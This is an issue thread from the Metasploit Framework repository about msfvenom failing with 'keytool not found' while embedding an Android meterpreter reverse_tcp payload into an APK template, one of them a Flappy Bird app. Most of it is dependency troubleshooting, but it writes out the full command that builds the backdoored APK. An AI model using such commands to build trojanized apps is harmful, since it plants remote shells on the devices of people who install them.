### ISSUE TITLE
msfvenom -x 

### ISSUE THREAD

**Issue by ALLERRORr** [rapid7/metasploit-framework#10614]
C:\metasploit-framework\bin>msfvenom -x /metasploit-framework/bin/1.apk -p android/meterpreter/reverse_tcp lhost=127.0.0.1 lport=6666 > 2.apk
Using APK template: /metasploit-framework/bin/1.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
Error: keytool not found. If it's not in your PATH, please add it.

windows 8
2 gb 
metasploit-framework (4.17.10)

modules in python not work in windows ?

**Comment by ALLERRORr** [comment]
how install it ( Keytools )? in windows have a specifc path? I'm sorry I don't understand this very much

**Comment by ALLERRORr** [comment]
I saw that in the code has a series of tools and where I can put them why in the installer did not come
 
(Keytool) not found 
(Jarsigner) not found
(zipalign) not found
(Apktool) not found 

My installer and this  https://windows.metasploit.com/

**Comment by wvu-r7** [comment]
It's special functionality in `msfvenom` and not provided as part of Framework. Please install it separately as noted.

**Comment by elogada** [comment]
Perhaps we can put it as part of the list of dependencies? I haven't encountered this problem yet as I do not build my own meterpreters, but perhaps downloading these from the repo could be automated.

**Comment by ALLERRORr** [comment]
Yes. Jarsigner already comes in the Java I was reading under this but does not run on Windows due does not find the repository in Windows and the Python also I installed the Python in the repository of the Metasploit. But it doesn't work

**Comment by ALLERRORr** [comment]
I downloaded the apktools but do not know where I put to run in the code this written so 

keytool = Run_cmd ( "Keytool ")
    Unless keytool! = Nil
      Raise RuntimeError,  "Keytool not found. If It's not in your PATH, please add it.  "
    End

Jarsigner = Run_cmd ( "Jarsigner ")
    Unless Jarsigner! = Nil
      Raise RuntimeError,  "Jarsigner not found. If It's not in your PATH, please add it.  "
    End

zipalign = Run_cmd ( "zipalign ")
    Unless zipalign! = Nil
      Raise RuntimeError,  "Zipalign not found. If It's not in your PATH, please add it.  "
    End

Apktool = Run_cmd ( "Apktool-version ")
    Unless apktool! = Nil
      Raise RuntimeError,  "Apktool not found. If It's not in your PATH, please add it.  "
    End

Type it does not find the folder

**Comment by Darkvicky** [comment]
Using APK template: flappy-bird-1-3-en-android.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
Error: keytool not found. If it's not in your PATH, please add it
inn kali linux (2021.2) please help me

**Comment by Darkvicky** [comment]
Using APK template: flappy-bird-1-3-en-android.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: [dalvik] from the payload
Error: keytool not found. If it's not in your PATH, please add it

in Kali Linux how to fix please fix me how to help me please
how to download key tool please help me please  all jdk up-to-date 
already in new  version

**Comment by timwr** [comment]
`sudo apt install openjdk-8-jre-headless`?

**Comment by timwr** [comment]
https://stackoverflow.com/questions/16333635/keytool-error-bash-keytool-command-not-found
